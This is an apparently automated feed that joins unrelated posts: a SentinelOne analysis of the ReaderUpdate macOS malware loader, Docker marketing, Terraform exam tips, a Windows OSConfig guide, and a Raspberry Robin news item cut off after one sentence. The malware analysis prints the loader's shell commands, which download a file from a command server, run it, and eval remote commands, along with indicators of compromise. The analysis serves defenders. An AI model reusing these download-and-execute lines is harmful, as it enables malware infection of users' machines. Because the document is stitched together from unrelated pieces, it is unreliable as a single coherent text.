Tuesday, March 25, 2025

ReaderUpdate Reforged | Melting Pot of macOS Malware Adds Go to Crystal, Nim and Rust Variants

ReaderUpdate is a macOS malware loader platform that, despite having been in the wild since at least 2020, has passed relatively unnoticed by many vendors and remains widely undetected. A report in 2023 observed that ReaderUpdate infections were contiguous with but distinct from WizardUpdate (aka UpdateAgent, Silver Toucan) infections and seen to deliver Genieo (aka DOLITTLE) adware. The loader seems to have been largely dormant since then until the latter half of 2024, when several vendors began reporting on previously unseen macOS malware samples written in the Crystal programming language. Variants written in Nim and Rust were also identified.

SentinelOne has identified further variants written in Go and attributed the malware to the same cluster of activity responsible for the previously reported ReaderUpdate infections. In this post, we discuss this cluster of activity and provide a technical breakdown of the Go variant. A comprehensive list of indicators is provided at the end of the post to aid defenders in identifying this malware and remediating infections. The SentinelOne Singularity™ Platform detects all known variants of ReaderUpdate malware.

ReaderUpdate | Compiled Python Binary

First observed in 2020, the original ReaderUpdate binary (SHA-1: fe9ca39a8c3261a4a81d3da55c02ef3ee2b8863f) is a x86 Mach-O that is typically found on infected hosts in the ~/Library/Application Support/ folder in a subfolder of the same name. A companion persistence agent com.readerupdate is dropped in the user’s LaunchAgents folder.

~/Library/Application Support/ReaderUpdate/ReaderUpdate
~/Library/LaunchAgents/com.readerupdate.plist

The executable weighs in at a hefty 5.63Mb due to the fact that it embeds the Python runtime and uses it to deliver a compiled Python script obfuscated with pyarmor. Researchers at IronNet gave a brief overview of how this early sample functioned, but for our purposes two things remain relevant to the infections we see today. IronNet noted that this binary reached out to a C2 domain at www[.]entryway[.]world, and further that it subsequently delivered a payload with the file name of V6QED2Q1WBYVOPE.

We see this same file delivered by a series of newer domains active since mid-2024 and associated with the Crystal, Nim, Rust and (now) Go malware loader samples.

sh -c chmod +x "/private/tmp/V6QED2Q1WBYVOPE" && 
"/private/tmp/V6QED2Q1WBYVOPE" --safetorun --host=limitedavailability-show[.]com --partner.affiliate_id=1463441 --partner.installer_id=92 --partner.user_id=177025082 -x; 
mv "/private/tmp/V6QED2Q1WBYVOPE_" "/private/tmp/V6QED2Q1WBYVOPE"

We assess this file to be a sample of Genieo (aka DOLITTLE, MaxOfferDeal) adware and an exact copy of the payload observed by IronNet in 2023. Moreover, we see the original domain www[.]entryway[.]world delivering versions of ReaderUpdate written in Crystal, Nim, Rust and Go into new locations such as ~/Library/Application Support/printers/printers , ~/Library/Application Support/etc/etc, and others (see the IoCs section at the end of this post) via a temporary filepath created using the /usr/bin/mktemp utility.

sh -c curl -s -X POST -d "get_info=1&device_id=<redacted UUID_1>&result=$(
{
tmp_path=$(mktemp /tmp/XXXXXXXXX) 2>&1
curl -s -f0L -o $tmp_path  -X POST -d "<redacted UUID_1>" http://www[.]entryway[.]world/reader-update/<redacted UUID_2> 2>&1
chmod +x $tmp_path 2>&1
$tmp_path 2>&1
res=$(curl -s -X POST -d "<redacted UUID_1>" http://www[.]entryway[.]world/reader-update/<redacted UUID_3>) 2>&1
eval "$res" 2>&1
}
)" http://www[.]entryway[.]world/reader-update
/tmp/mH2mc7dFe

A corresponding LaunchAgent is created in the User’s Library folder to execute the target binary on login.

ReaderUpdate persistence agent
ReaderUpdate persistence agent

Note that if the malware is created via a process running with elevated privileges, the target binary and the persistence agent will be created in the corresponding subfolders of /private/var/root rather than /Users/user/.

ReaderUpdate Reforged

Including the original compiled Python version, ReaderUpdate is currently distributed in five variants compiled from five different source languages.

Language ~Size Example SHA-1
Compiled Python 5.6Mb fe9ca39a8c3261a4a81d3da55c02ef3ee2b8863f
Go 4.5Mb 36ecc371e0ef7ae46f25c137aa0498dfd4ff70b3
Crystal 1.2Mb 86431ce246b54ec3372f08c7739cd1719715b824
Rust 400Kb 01e762ef8a10bbcda639ed62ef93b784268d925a
Nim 166Kb 21a2ec703a68382b23ce9ff03ff62dae07374222

We observed distribution of the newer variants through existing infections of the older ReaderUpdate. Industry peers have privately reported seeing ReaderUpdate delivered through software obtained from free or third-party software download sites, in some cases through package installers containing fake or trojanized utility apps such as “DragonDrop” (aka Drag-and-Drop, Drag-on Drop).

All versions of ReaderUpdate are compiled solely for x86 Intel architecture, meaning they will not execute on Apple silicon Macs unless Rosetta 2 is installed.

In late January, researchers at Macpaw under the social media account name @moonlock_lab posted a thread detailing the technical details of the Crystal version. This followed a posting on December 18th exploring the Nim version, and a post by Mosyle in November that gave brief details on both of those as well as the Rust version.

Until now, there has been no public reporting of the Go version, which we detail next.

Technical Analysis of the Go Variant

We analyzed 36ecc371e0ef7ae46f25c137aa0498dfd4ff70b3, an x86 binary compiled from Go source code. Functions have random names in an attempt to complicate analysis, but the call tree from main.main() leads to a secondary function of around 1.8Kb that contains much of the logic.

Function names are randomized to hinder analysis
Function names are randomized to hinder analysis

On execution, the malware first collects system hardware information by executing the native system_profiler SPHardwareDataType command. This information is later used to form a unique identifier for the victim and sent to the C2.

ReaderUpdate then checks to confirm that the parent process is running from ~/Library/Application Support/<malware name>/ folder and creates it if not. It then copies itself into this folder, using the same file name. This is why all incidences of ReaderUpdate have the pattern:

~/Library/Application Support/<malware name>/<malware name>

ReaderUpdate then creates a companion .plist file, again using the same name: ~/Library/LaunchAgens/com.<malware name>.plist. Interestingly, the malware authors failed to account for the possibility that this folder, which does not exist by default on a new macOS install, may not be available: the code will fail if the Library LaunchAgents folder does not already exist. Otherwise, the code then unloads and reloads the launchd process via launchctl unload and load commands.

Near the end of this function, immediately before the sleep() command, a subfunction is called that handles the connecton to the C2. As noted, the malware sends a unique identifier calculated from the hardware UUID value obtained by running the system_profiler SPHardwareDataType command. The - characters are removed and the integer value obtained from big.Int is incremented by one and sent as the victim ID.

If the malware receives a response from the C2, it parses and executes it with the (*Cmd).Run() function from Go’s os/exec package. This is significant from a defensive point of view since it shows the loader is capable of executing whatever remote commands the operator chooses to send. While to date ReaderUpdate infections have only been associated with known adware, the loader has the capability to change the payload to something more malicious. This is consistent with a loader platform that might be used to offer pay-per-install (PPI) or malware-as-a-service to other threat actors.

The code receives the command from the C2 and executes it
The code receives the command from the C2 and executes it

Throughout the binary, the developers obfuscate many of the strings, including the C2 URL and the property list content using functions that either assemble characters on the stack or run some simple character substitution algorithm.

System_Profiler string is assembled on the stack in this function
System_Profiler string is assembled on the stack in this function

Some of the character substitution routines seem redundant as the resulting string is already constructed elsewhere, a method likely intended to try and complicate analysis. Similarly, the malware uses several variations of the substitution mechanism, which generally takes a value from an array and then either subtracts or adds another value at a fixed offset from the same array before converting the resulting value back to a valid ascii character value. For example:

for (lVar1 = 0; lVar1 < 0x12; lVar1 = lVar1 + 1) {
local_2c[lVar1] = local_2c[lVar1] - local_2c[lVar1 + 0x12];
}
One of several functions that use simple character substitution for string obfuscation
One of several functions that use simple character substitution for string obfuscation

Compared to the Nim, Crystal and Rust variants, of which we have identified several hundred unique samples, the Go version seems relatively less common, with only 9 samples identified to date, reaching out to 7 unique domains:

airconditionersontop[.]com
lakesandinnovations[.]com
livingscontinuations[.]com
simulators-and-cars[.]com
slothingpressing[.]com
small-inches[.]com
streamingleaksnow[.]com

By pivoting off this list of domains, we can see they are connected to a larger set of infrastructure that connects the Go samples to the other variants, including the original compiled Python version of ReaderUpdate via entryway[.]world.

Conclusion

ReaderUpdate is a widespread campaign utilising binaries written in a variety of different source languages, each containing its own unique challenges for detection and analysis. Interestingly, this loader platform has been quietly infecting victims through old infections that went largely unnoticed as long as 2020 due to the malware remaining dormant or delivering little more than adware.

Nevertheless, where compromised, hosts remain vulnerable to the delivery of any payload the operators choose to deliver, whether of their own or sold as Pay-per-Install or malware-as-a-service on underground markets.

The SentinelOne Singularity™ Platform detects all known variants of ReaderUpdate malware. Organizations without such protection are urged to review the list of indicators provided below to maintain a strong defensive posture.

Indicators of Compromise

SHA1 – Go bins
0b689c5677445729c609e284e91c7048a1d8bc11
1f6d6c9f3841d0477d8b38a64935e0b58e57605f
36ecc371e0ef7ae46f25c137aa0498dfd4ff70b3
6461ec3154bec2f4dac27b84951ab28e1287d8c9
7aa028fd7350193be167dc772a7eb486c9fa1c17
9b7590c4313159810443efcc6648837519b061d6
b0bbe83895647a1efe6843d1c619059b00f72cf3
d25eae2de64bb604987db27085d60f3ddf7ca473
ff6d99505c87876b613d511d8734a9379b826e1a

SHA-1 Compiled Python bin
fe9ca39a8c3261a4a81d3da55c02ef3ee2b8863f

Domains (FQDNs)
airconditionersontop[.]com
lakesandinnovations[.]com
limitedavailability-show[.]com
livingscontinuations[.]com
motorcyclesincyprus[.]com
simulators-and-cars[.]com
slothingpressing[.]com
small-inches[.]com
strawberriesandmangos[.]com
streamingleaksnow[.]com
www[.]entryway[.]world

URLs

http://<fqdn>/library
http://<fqdn>/writer

Target Executable Filepaths
~/Library/Application Support/drivers/drivers
~/Library/Application Support/etc/etc
~/Library/Application Support/install/install
~/Library/Application Support/installation_instructions/installation_instructions
~/Library/Application Support/printers/printers
~/Library/Application Support/seeker/seeker
~/Library/Application Support/sleuth/sleuth
~/Library/Application Support/uninstall/uninstall

Persistence Agents
~/Library/LaunchAgents/com.drivers.plist
~/Library/LaunchAgents/com.etc.plist
~/Library/LaunchAgents/com.install.plist
~/Library/LaunchAgents/com.installation_instructions.plist
~/Library/LaunchAgents/com.printers.plist
~/Library/LaunchAgents/com.seeker.plist
~/Library/LaunchAgents/com.sleuth.plist
~/Library/LaunchAgents/com.uninstall.plist

Nim, Crystal, Rust IoCs
A collection of indicators for the Nim, Crystal and Rust samples, many of which remain undetected on VirusTotal, can be found here (our thanks to @moonlock_lab).



from SentinelOne https://ift.tt/CkZYcD9
via IFTTT

8 Ways to Empower Engineering Teams to Balance Productivity, Security, and Innovation

This post was contributed by Lance Haig, a solutions engineer at Docker.

In today’s fast-paced development environments, balancing productivity with security while rapidly innovating is a constant juggle for senior leaders. Slow feedback loops, inconsistent environments, and cumbersome tooling can derail progress. As a solutions engineer at Docker, I’ve learned from my conversations with industry leaders that a key focus for senior leaders is on creating processes and providing tools that let developers move faster without compromising quality or security. 

Let’s explore how Docker’s suite of products and Docker Business empowers industry leaders and their development teams to innovate faster, stay secure, and deliver impactful results.

1. Create a foundation for reliable workflows

A recurring pain point I’ve heard from senior leaders is the delay between code commits and feedback. One leader described how their team’s feedback loops stretched to eight hours, causing delays, frustration, and escalating costs.

Optimizing feedback cycles often involves localizing testing environments and offloading heavy build tasks. Teams leveraging containerized test environments — like Testcontainers Cloud — reduce this feedback loop to minutes, accelerating developer output. Similarly, offloading complex builds to managed cloud services ensures infrastructure constraints don’t block developers. The time saved here is directly reinvested in faster iteration cycles.

Incorporating Docker’s suite of products can significantly enhance development efficiency by reducing feedback loops. For instance, The Warehouse Group, New Zealand’s largest retail chain, transformed its development process by adopting Docker. This shift enabled developers to test applications locally, decreasing feedback loops from days to minutes. Consequently, deployments that previously took weeks were streamlined to occur within an hour of code submission.

2. Shorten feedback cycles to drive results

Inconsistent development environments continue to plague engineering organizations. These mismatches lead to wasted time troubleshooting “works-on-my-machine” errors or inefficiencies across CI/CD pipelines. Organizations achieve consistent environments across local, staging, and production setups by implementing uniform tooling, such as Docker Desktop.

For senior leaders, the impact isn’t just technical: predictable workflows simplify onboarding, reduce new hires’ time to productivity, and establish an engineering culture focused on output rather than firefighting. 

For example, Ataccama, a data management company, leveraged Docker to expedite its deployment process. With containerized applications, Ataccama reduced application deployment lead times by 75%, achieving a 50% faster transition from development to production. By reducing setup time and simplifying environment configuration, Docker allows the team to spin up new containers instantly and shift focus to delivering value. This efficiency gain allowed the team to focus more on delivering value and less on managing infrastructure.

3. Empower teams to collaborate in distributed workflows

Today’s hybrid and remote workforces make developer collaboration more complex. Secure, pre-configured environments help eliminate blockers when working across teams. Leaders who adopt centralized, standardized configurations — even in zero-trust environments — reduce setup time and help teams remain focused.

Docker Build Cloud further simplifies collaboration in distributed workflows by enabling developers to offload resource-intensive builds to a secure, managed cloud environment. Teams can leverage parallel builds, shared caching, and multi-architecture support to streamline workflows, ensuring that builds are consistent and fast across team members regardless of their location or platform. By eliminating the need for complex local build setups, Docker Build Cloud allows developers to focus on delivering high-quality code, not managing infrastructure.

Beyond tools, fostering collaboration requires a mix of practices: sharing containerized services, automating repetitive tasks, and enabling quick rollbacks. The right combination allows engineering teams to align better, focus on goals, and deliver outcomes quickly.

Empowering engineering teams with streamlined workflows and collaborative tools is only part of the equation. Leaders must also evaluate how these efficiencies translate into tangible cost savings, ensuring their investments drive measurable business value.

To learn more about how Docker simplifies the complex, read From Legacy to Cloud-Native: How Docker Simplifies Complexity and Boosts Developer Productivity.

4. Reduce costs

Every organization feels pressured to manage budgets effectively while delivering on demanding expectations. However, leaders can realize cost savings in unexpected areas, including hiring, attrition, and infrastructure optimization, by adopting consumption-based pricing models, streamlining operations, and leveraging modern tooling.

Easy access to all Docker products provides flexibility and scalability 

Updated Docker plans make it easier for development teams to access everything they need under one subscription. Consumption is included for each new product, and more can be added as needed. This allows organizations to scale resources as their needs evolve and effectively manage their budgets. 

Cost savings through streamlined operations

Organizations adopting Docker Business have reported significant reductions in infrastructure costs. For instance, a leading beauty company achieved a 25% reduction in infrastructure expenses by transitioning to a container-first development approach with Docker. 

Bitso, a leading financial services company powered by cryptocurrency, switched to Docker Business from an alternative solution and reduced onboarding time from two weeks to a few hours per engineer, saving an estimated 7,700 hours in the eight months while scaling the team. Returning to Docker after spending almost two years with the alternative open-source solution proved more cost-effective, decreasing the time spent onboarding, troubleshooting, and debugging. Further, after transitioning back to Docker, Bitso has experienced zero new support tickets related to Docker, significantly reducing the platform support burden. 

Read the Bitso case study to learn why Bitso returned to Docker Business.

Reducing infrastructure costs with modern tooling

Organizations that adopt Docker’s modern tooling realize significant infrastructure cost savings by optimizing resource usage, reducing operational overhead, and eliminating inefficiencies tied to legacy processes. 

By leveraging Docker Build Cloud, offloading resource-intensive builds to a managed cloud service, and leveraging shared cache, teams can achieve builds up to 39 times faster, saving approximately one hour per day per developer. For example, one customer told us they saw their overall build times improve considerably through the shared cache feature. Previously on their local machine, builds took 15-20 minutes. Now, with Docker Build Cloud, it’s down to 110 seconds — a massive improvement.

Check out our calculator to estimate your savings with Build Cloud.

5. Retain talent through frictionless environments

High developer turnover is expensive and often linked to frustration with outdated or inefficient tools. I’ve heard countless examples of developers leaving not because of the work but due to the processes and tooling surrounding it. Providing modern, efficient environments that allow experimentation while safeguarding guardrails improves satisfaction and retention.

Year after year, developers rank Docker as their favorite developer tool. For example, more than 65,000 developers participated in Stack Overflow’s 2024 Developer Survey, which recognized Docker as the most-used and most-desired developer tool for the second consecutive year, and as the most-admired developer tool.

Providing modern, efficient environments with Docker tools can enhance developer satisfaction and retention. While specific metrics vary, streamlined workflows and reduced friction are commonly cited as factors that improve team morale and reduce turnover. Retaining experienced developers not only preserves institutional knowledge but also reduces the financial burden of hiring and onboarding replacements.

6. Efficiently manage infrastructure 

Consolidating development and operational tooling reduces redundancy and lowers overall IT spend. Organizations that migrate to standardized platforms see a decrease in toolchain maintenance costs and fewer internal support tickets. Simplified workflows mean IT and DevOps teams spend less time managing environments and more time delivering strategic value.

Some leaders, however, attempt to build rather than buy solutions for developer workflows, seeing it as cost-saving. This strategy carries risks: reliance on a single person or small team to maintain open-source tooling can result in technical debt, escalating costs, and subpar security. By contrast, platforms like Docker Business offer comprehensive protection and support, reducing long-term risks.

Cost management and operational efficiency go hand-in-hand with another top priority: security. As development environments grow more sophisticated, ensuring airtight security becomes critical — not just for protecting assets but also for maintaining business continuity and customer trust.

7. Secure developer environments

Security remains a top priority for all senior leaders. As organizations transition to zero-trust architectures, the role of developer workstations within this model grows. Developer systems, while powerful, are not exempt from being targets for potential vulnerabilities. Securing developer environments without stifling productivity is an ongoing leadership challenge.

Tightening endpoint security without reducing autonomy

Endpoint security starts with visibility, and Docker makes it seamless. With Image Access Management, Docker ensures that only trusted and compliant images are used throughout your development lifecycle, reducing exposure to vulnerabilities. However, these solutions are only effective if they don’t create bottlenecks for developers.

Recently, a business leader told me that taking over a team without visibility into developer environments and security revealed significant risks. Developers were operating without clear controls, exposing the organization to potential vulnerabilities and inefficiencies. By implementing better security practices and centralized oversight, the leaders improved visibility and reduced operational risks, enabling a more secure and productive environment for developer teams. This shift also addressed compliance concerns by ensuring the organization could effectively meet regulatory requirements and demonstrate policy adherence.

Securing the software supply chain

From trusted content repositories to real-time SBOM insights, securing dependencies is critical for reducing attack surfaces. In conversations with security-focused leaders, the message is clear: Supply chain vulnerabilities are both a priority and a pain point. Leaders are finding success when embedding security directly into developer workflows rather than adding it as a reactive step. Tools like Docker Scout provide real-time visibility into vulnerabilities within your software supply chain, enabling teams to address risks before they escalate. 

Securing developer environments strengthens the foundation of your engineering workflows. But for many industries, these efforts must also align with compliance requirements, where visibility and control over processes can mean the difference between growth and risk.

Improving compliance

Compliance may feel like an operational requirement, but for senior leadership, it’s a strategic asset. In regulated industries, compliance enables growth. In less regulated sectors, it builds customer trust. Regardless of the driver, visibility, and control are the cornerstones of effective compliance.

Proactive compliance, not reactive audits

Audits shouldn’t feel like fire drills. Proactive compliance ensures teams stay ahead of risks and disruptions. With the right processes in place — automated logging, integrated open-source software license checks, and clear policy enforcement — audit readiness becomes a part of daily operations. This proactive approach ensures teams stay ahead of compliance risks while reducing unnecessary disruptions.

While compliance ensures a stable and trusted operational baseline, innovation drives competitive advantage. Forward-thinking leaders understand that fostering creativity within a secure and compliant framework is the key to sustained growth.

8. Accelerating innovation

Every senior leader seeks to balance operational excellence and fostering innovation. Enabling engineers to move fast requires addressing two critical tensions: reducing barriers to experimentation and providing guardrails that maintain focus.

Building a culture of safe experimentation

Experimentation thrives in environments where developers feel supported and unencumbered. By establishing trusted guardrails — such as pre-approved images and automated rollbacks — teams gain the confidence to test bold ideas without introducing unnecessary risks.

From MVP to market quickly

Reducing friction in prototyping accelerates the time-to-market for Minimum Viable Products (MVPs). Leaders prioritizing local testing environments and streamlined approval processes create conditions where engineering creativity translates directly into a competitive advantage.

Innovation is no longer just about moving fast; it’s about moving deliberately. Senior leaders must champion the tools, practices, and environments that unlock their teams’ full potential.

Unlock the full potential of your teams

As a senior leader, you have a unique position to balance productivity, security, and innovation within your teams. Reflect on your current workflows and ask: Are your developers empowered with the right tools to innovate securely and efficiently? How does your organization approach compliance and risk management without stifling creativity?

Tools like Docker Business can be a strategic enabler, helping you address these challenges while maintaining focus on your goals.

Learn more

  • Docker Scout: Integrates seamlessly into your development lifecycle, delivering vulnerability scans, image analysis, and actionable recommendations to address issues before they reach production.
  • Docker Health Scores: A security grading system for container images that offers teams clear insights into their image security posture.
  • Docker Hub: Access trusted, verified content, including Docker Official Images (DOI), to build secure and compliant software applications.
  • Docker Official Images (DOI): A curated set of high-quality images that provide a secure foundation for containerized applications.
  • Image Access Management (IAM): Enforce image-sharing policies and restrict access to sensitive components, ensuring only trusted team members access critical assets.
  • Hardened Docker Desktop: A tamper-proof, enterprise-grade development environment that aligns with security standards to minimize risks from local development.


from Docker https://ift.tt/wAGdpv7
via IFTTT

Ace your Terraform Professional exam: 5 tips from certified pros

It’s no secret. The Terraform Authoring and Operations Professional with AWS exam is intense. Test takers must answer multiple-choice questions and complete hands-on labs that include writing code, troubleshooting, and solving issues pulled from the real world, all within a four-hour window. The complexity of the exam is essential in validating real, deeply technical Terraform expertise, but it can also make preparing for the exam daunting. That’s why we asked three newly certified Terraform pros to sit down with us and share their advice for success.

Meet the pros

Our pros have different roles, different backgrounds, and different experiences with the Terraform Authoring & Ops Pro exam. Two things they have in common? They passed the exam and are ready to share their tips with you.

  • Elif Samedin is an Independent Consultant from Bucharest, Romania engaging with clients spanning various industries.
  • Aman Puri specializes in cloud app modernization in the IT industry and is currently based in Mumbai, India.
  • Ben Dalton is a Cloud Infrastructure Engineer in the financial services industry in London, England.
Photos

Tip 1: Have the right foundation

The Terraform Authoring & Ops Pro exam is not for everyone. While you might be able to pass the Terraform Associate exam with theoretical knowledge and some practice, the Terraform Pro exam requires real-world experience. Elif puts it like this, “You can’t just memorize Terraform documentation and expect to pass [Terraform Pro]—you need hands-on experience working with infrastructure in a cloud environment.”

Before scheduling your exam appointment, take some time to evaluate whether the exam is the right fit for you. We’ve compiled some resources to help you:

  • HashiCorp Developer describes who this exam is for and lists important prerequisites.
  • Our Exam Orientation page gets deeper into the skills and knowledge you should have before taking the exam.
  • The Learning Path walks you through the content you can expect on the exam.

Tip 2: Practice, practice, practice

You might think it goes without saying, but it’s so important we’re saying it three times: practice, practice, practice.

All three of our pros agree.

Aman created his own Terraform projects to practice:

“[I started by comparing] what I actually know from my personal experience with what I needed to know, based on the exam description. There were quite a few concepts that I knew about, but only conceptually, so there were things that I still had to learn from a practical perspective… To do so, I created my own scenarios and then tried to experiment with those [topics]. That helped me a lot, because I could anticipate what I would see on the exam more.”

Ben also found comparing his standing knowledge with the exam prep materials helpful:

“For areas I wasn’t as confident in, I made a point to read through the material and then test things out in my own environment. I set up my own Terraform configuration, created local states, built modules, and experimented with moving things around. Practicing in a hands-on environment made a huge difference because it helped me reinforce my understanding and problem-solving skills.”

Elif leaned on practice projects as well, and had this suggestion for those who are preparing:

“I would kick things off by having them build a Terraform module. Then we would build from there, covering different topics. This practical approach helps candidates touch on various topics organically and reinforces concepts they’ll encounter in the exam.”

The consensus is: compare your skills with the Exam Content List and then practice in your own Terraform environment.

Tip 3: Be open to learning something new

We were delightfully surprised to hear that our Terraform pros also treated their exam prep like a learning path. Each learned about a new topic, function, or tool in Terraform during their study.

In Aman’s words, “[One] cool thing is that this certification encourages a culture of continuous learning. Cloud tech moves fast, and staying up to date is super important.”

For Ben, the exam helped him dive deeper into using Terraform in different ways,

“I've used Terraform in the most common ways to provision and manage infrastructure in the cloud, but there are some topics I haven’t explored as much, such as migrating resources between state files. So for me, that was an opportunity for me to learn some more, and sort of put into practice some scenarios that I could come across in the future.”

And Elif “discovered the Terraform remote state data source through certification prep”, saying, “Turns out it's useful for things like sharing Terraform state, but sharing the whole file with sensitive data inside? Not the best idea.”

So, while you need production experience with Terraform before attempting the exam, it doesn’t mean you have to be an expert on everything. If you approach your study activities with a growth mindset, you might just learn something new on the way to achieving your certification goals.

Tip 4: Get familiar with HashiCorp docs

In our conversation with Ben, he shared one tip that is commonly overlooked: familiarize yourself with HashiCorp documentation.

During the Terraform Professional exam, you will have access to the official Terraform documentation. The documentation will likely be critical to your exam success, but relying on the docs without being familiar with their structure can hurt your time management, “In real life, we tend to rely on Google or Stack Overflow to find answers quickly. But in the exam, you can’t do that. You need to know how to find what you need directly within HashiCorp’s docs. That would have saved me some time during the test.”

Not only will reviewing the Terraform docs help you prepare for the exam content, but if you pay close attention to how they’re structured, you’ll be well prepared to use the docs to your advantage on exam day too.

Tip 5: Avoid these common mistakes

In addition to what to do during your exam prep and appointment, our pros shared a few things not to do.

Don’t: Mis-manage your time

We touched on it before, but it’s worth noting again: managing your time well is important in your success on the exam.

In a four-hour exam, it may seem like you have plenty of time, but most exam takers end up using most if not all of their allotted time. Ben mentions that this was one of the toughest parts of the exam, “One of the biggest challenges was balancing accuracy with speed. Some tasks required deep thinking and debugging skills, and in a high-pressure environment, it’s easy to get stuck on a problem for too long.”

To ensure you manage your time well on exam day, “focus on practicing complex Terraform scenarios with a time constraint to get used to thinking fast and making decisions under pressure,” suggests Ben.

Don’t: Forget the basics

In a high-pressure testing environment, it’s easy to get overwhelmed. But, as an experienced engineer, don’t forget to remember your fundamentals during the exam.

“A major trap is overlooking the basics,” Elif says, “before diving into advanced topics, it’s crucial to understand why Terraform exists, how it compares to other tools, and how it fits into the broader infrastructure landscape.”

Aman shares an example that helped him, saying “I made sure to always run terraform_plan before applying anything! That’s a lifesaver in both real-world work and the exam.”

In other words, trust your instincts, lean on your knowledge and practice, and you’ll be well set up for success.

Don’t: Get discouraged (especially on your first attempt)

Elif put it so well at the end of our interview, “Certifications are milestones, not endpoints — keep learning! Also, don’t be discouraged if you don’t pass on the first try. The experience you gain in preparation will still be invaluable to your growth as an engineer.”

Plus, your Terraform Professional exam fee includes one free retake if you don’t pass on your first try — even more reason to look on the bright side if you struggle the first time around.

Conclusions

We hope these tips will demystify the Terraform Authoring & Operations Professional exam and set you up for success in your preparation.

Remember what our exam pros said:

  • Have the right foundation: Know if this exam is for you by reviewing the materials on HashiCorp Developer.
  • Practice, practice, practice: Build your own practice environments and experiment with the tools, functions, and tasks you may be less familiar with.
  • Be open to learning something new: You don’t have to be an expert on all things Terraform; be willing to fill in any knowledge or skill gaps during your prep.
  • Get familiar with HashiCorp docs: Ensure you can make the most out of the tools given to you on exam day by knowing how to navigate the docs.
  • Avoid common mistakes: Manage your time well, utilize your hard-earned skills, and stay committed to growth. It’s what makes the certification journey worth it.

Thank you to Elif, Aman, and Ben for sharing their experience with us! We hope their advice has you feeling ready to start (or continue) your Terraform Professional certification journey.



from HashiCorp Blog https://ift.tt/4PyufV2
via IFTTT

OSconfig in Action: Maintaining Security and Configuration Compliance

Maintaining homogenous security settings across your environment might be challenging. Over time, there can be what’s called a configuration drift where the system deviates from the original security settings. How do you maintain those security settings in Windows Server 2025? One of the tools which Microsoft provides to us, to maintain the desired security state of your servers, is called OSconfig and in this post we’ll explore its possibilities.

The OSconfig is able to automatically maintain and correct any system changes that deviate from the desired state. The tool does this via a refresh task. The Windows Server 2025 baseline includes over 300 security settings to ensure that it meets industry-standard security requirements.

OSConfig can maintain security settings for WS 2025 machines running locally or for Azure Arc connected machines and also for Azure Local (v 23H2). OSconfig integrates with Azure Policy, Microsoft Defender, WAC and Azure Automanage machine configuration, in order to provide monitoring and compliance reporting.

OSConfig has nothing to do with Group Policy Objects (GPO) which are commonly used in IT environments based on Microsoft’s OS while managing systems being part of Microsoft Active Directory (AD) or Entra ID. It’s rather complementary tool which can be applied for isolated cloud servers, isolated machines running in Workgroup or individual systems. But the provided security baselines (or templates) are also for Domain controllers and member servers.

The OSConfig Architecture and configuration flow

The tool consists of some base PowerShell cmdlets, native APIs and scenario definition which defines the desired state config. The configs are basically a group of settings that use a predefined order and dependencies that correspond to subareas.

The flow of configuration is represented on the image below (from Microsoft). Basically, you can use the tool via Windows Admin Center (WAC) Azure Policy or locally via PowerShell.

OSConfig Workflow

OSConfig Workflow

The Drift Control

One of the main features of OSconfig is probably the drift control allowing you to make sure that your systems start and stay in a known good security state. After turning on, the OSConfig automatically corrects any system changes that deviate from the desired state. OSconfig does the correction via a refresh task.

If the OSconfig is turned off, the refresh task is disabled automatically too. You’re free to use OSconfig or another utility, as long as both aren’t turned ON at the same time.

The main use case is to deploy a recommended security settings to your hosts and VMs and then, during the lifecycle of the OS, you can apply the security baselines by using PowerShell or Windows Admin Center (WAC).

The advantage of using OSConfig:

Allows you to meet Defense Information Systems Agency Security Technical Implementation Guides (DISA STIGs).

Reduces operation expenses via the built-in automatic drift protection

Increases security by disabling legacy protocols

Enforces the desired state via configuration drift detection, reporting, and correction

Installation of OSconfig via PowerShell

A simple line of code allows you to install on a WS2025. The machine needs an internet connection as one of the pre-requis is to deploy NuGet provider.

Install-Module -Name Microsoft.OSConfig -Scope AllUsers -Repository PSGallery -Force

 

Installation of OSconfig via PowerShell

Installation of OSconfig via PowerShell

 

Then to verify that the OSconfig module is installed, run this command:

Get-Module -ListAvailable -Name Microsoft.OSConfig

 

Verification of the installation

Verification of the installation

 

You can then use one of the pre-defined baselines depending on what your machine shall do. Is it a domain controller, member server (domain joined) or workgroup (isolated system).

From Microsoft:

To apply the baseline for a domain-joined device, run the following command:

Set-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/MemberServer -Default

To apply the baseline for a device that’s in a workgroup, run the following command:

Set-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/WorkgroupMember -Default

Here is a screenshot

Applying a security baseline to an isolated server

Applying a security baseline to an isolated server

 

To apply the baseline for a device that’s configured as the DC, run the following command:

Set-OSConfigDesiredConfiguration -Scenario SecurityBaseline/WS2025/DomainController -Default

To apply the secured-core baseline for a device, run the following command:

Set-OSConfigDesiredConfiguration -Scenario SecuredCore -Default

To apply the Microsoft Defender Antivirus baseline for a device, run the following command:

Set-OSConfigDesiredConfiguration -Scenario Defender/Antivirus -Default

Check more details about how to remove baseline, check compliance or verify on Microsoft’s website here.

When you load Windows Admin Center (WAC) you can see the module, the different templates and the compliance status as this.

Windows admin center view

Windows admin center view

 

When you change the baseline and check, you’ll get diffent view where you can Apply and Maintain the config via the button.

Apply and maintain security baseline via WAC

Apply and maintain security baseline via WAC

 

This looks pretty good IMHO. Use WAC for a group of machines connected to it. I think this is the way to go, but WAC is still not finished and cannot be used for an administration of ALL settings. However we can see where Microsoft is heading…..

Note: When you apply or remove a baseline, you must restart for changes to take effect.

Customizations possibilities

You can customize WS2025 security baselines and still maintain the drift control. Check for further details at Microsoft here.

Final Words

Microsoft has released WS 2025 couple of weeks, months ago. The system will certainly have some bugs, updates that will improve and add what’s missing. There is no doubt about it. For now, the security settings and compliance towards DISA STIGs can be achieved via the PowerShell module or via WAC. The GPO templates, apparently, aren’t there just yet.

It’s great to see actually, that a simple PowerShell script can harden and maintain a security baseline over time for your critical systems. In my lab test, the WAC worked, but I had to disable the automatic updates during the installation because I could not connect to my server via the WAC UI. Disabling the automatic updates of the extensions solved the problem. We can see that Microsoft is working on it and that this is something that needs to be finalized so I’d advice to wait for deploying on production systems. In the lab you can test many things, but production is production.



from StarWind Blog https://ift.tt/tFBGlL2
via IFTTT

Researchers Uncover ~200 Unique C2 Domains Linked to Raspberry Robin Access Broker

Mar 25, 2025Ravie LakshmananThreat Intelligence / Malware

A new investigation has unearthed nearly 200 unique command-and-control (C2) domains associated with a malware called Raspberry Robin.

